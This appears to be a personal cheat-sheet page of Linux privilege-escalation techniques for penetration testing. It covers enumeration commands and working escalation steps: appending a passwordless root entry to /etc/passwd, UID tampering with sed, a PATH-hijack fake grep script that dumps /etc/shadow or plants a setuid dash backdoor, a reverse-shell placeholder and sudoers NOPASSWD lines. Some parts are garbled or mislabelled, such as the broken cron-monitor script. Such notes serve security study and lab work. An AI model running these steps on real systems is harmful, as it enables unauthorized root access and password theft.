Linux Escalation

Last updated 2 years ago

Was this helpful?

Linux Escalation

The Single Best Resource:

Shell Change:

Some shells have vulnerabilities that others do not. The default bash program has far less vulns than shells like zsh. We can copy shells to directories that we have root privs on and then chmod 4755 on the new program. When we launch this local program we will then have root privs. We can also change the symbolic links for shells to point at a shell program that we want to run. //changing symbolic link //this one has us doing it as root though and is from my sec class //might be unreliable since we don't have root $ su Password: (enter root password) # cd /bin # rm sh # ln -s zsh sh

SUDO as another User

(we had sudo rights for a file owned by user 1000): $sudo -u#1000 ./file.sh

Write to PASSWD:

#echo root::0:0:root:/root:/bin/bash >> /etc/passwd #su #openssl passwd mypassword //will output a hashed password like ASWsdfhjL56. then we add that between the colons and save then we can either su to root or can ssh to root.

Add user and mod group:

#cd home/ && ls

We got denied the file read so we decide to try and add a user with the same UUID of 1014. #sudo adduser pwn //we automatically got assigned the 1001 user so we will need to change it to 1014 to read the file. #sudo sed -i -e 's/1001/1014/g' /etc/passwd //-i inline replace, -e execute script check with: #cat /etc/passwd | grep pwn #su pwn #id

OS info:

#cat /etc/issue #cat /etc/*-release

List processes:

#ps axu

Network info:

#ip a #/sbin/route #ss -anp

Firewall:

-Check /etc/iptables -We can also search for files created by the iptables-save command, which is used to dump thefirewall configuration to a file specified by the user. This file is then usually used as input for theiptables-restore command and used to restore the firewall rules at boot time. If a systemadministrator had ever run this command, we could search the configuration directory (/etc) orgrep the file system for iptables commands to locate the file.

Scheduled tasks:

#ls -lah /etc/cron* #cat /etc/crontab //search for cron jobs writable by all users find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

Installed apps and patch levels:

#dpkg -l or #rpm

Read/Write files:

# find / -writable -type d 2>/dev/null

mounted disk:

#cat /etc/fstab and #mount all avail disks: #/bin/lsblk

Kernel modules (drivers):

#lsmod #/sbin/modinfo <module to look at>

Looking for SUID files:

#find / -perm -u=s -type f 2>/dev/null or #find / -perm /4000 2>/dev/null //Now get a list of all the default suid files for that operating system and compare to see which are not default installations and what is likely user added. Run the suid binary (this case bash) with the suid bit: #./bash -p //if you ever need to launch a shell file with suid make sure to try using /bin/dash since dash wont drop suid bits the way bash will. Show library calls of SUID files: //that are being called by a program. This is good to see how program command arguments are being used to abuse them. #ltrace /usr/bin/checkHost 8.8.8.8 //there is also #strace that will show system calls but this will dos you with to much information. In this example we saw it was running the command "ping 8.8.8.8 |grep tra" //since grep is not path specified "/bin/grep" we can make our own grep command and force its use with the suid bit. This first file method is best because it will give you passwords and not just root. ----file---named-->grep #!/bin/dash cat /etc/shadow --------------------- --or--auto-root--- #!/bin/dash cp /bin/dash backdoor chown root:root backdoor chmod u+s backdoor -------------------- --or-r-shell-------- #!/bin/dash nc shell here --------------------- #chmod 755 grep #export PATH=.:$PATH //tells OS to check our current directory for binary programs before looking at /bin //so now if we run the program it will give us a root shell #checkHost 8.8.8.8 //returns shadow file to then use JTR on

history

Env variables for history: $HISTSIZE //number of command stored in history for the current user and session $HISTFILESIZE //how many commands are stored in the history file config file where these setting are saved: .Bashrc Run a command from history:

#history pick the number then: #!3 can rerun last command with: #!! Search cmd history: ctrl-r then start typing command name

fc: With ‘fc’ we can list command line history and also edit previous commands in a vi like experience to then re-execute them. This is shell local and not built into the OS List commands: #fc -l // we can append numbers to the end to select ranges or specific commands

Cron Job check

Monitor processes to check for running cron jobs.

#!/bin/bash
#Loop by line
IFS=$'\n'
old_process=$(ps -eo command)
while true; do new_process=$(ps -eo command) diff <(echo "$old_process") <(echo "$new_process") | grep [<>] sleep 1 old_process=$new_process 
done

Add shadow file

add yourself to shadow file:

#echo -e "/r/nwww-data ALL=(ALL)NOPASSWD: ALL"

echo -e "/r/njeremy ALL=(ALL)NOPASSWD: ALL"

Processes

Process Spying:

located in /opt/pspy/

check vuln box attributes

#uname -a

on attacker build the tool (in pspy dir):

#GOOS=linux GOARCH=amd64 go build

PreviousObject Linking NextAutomated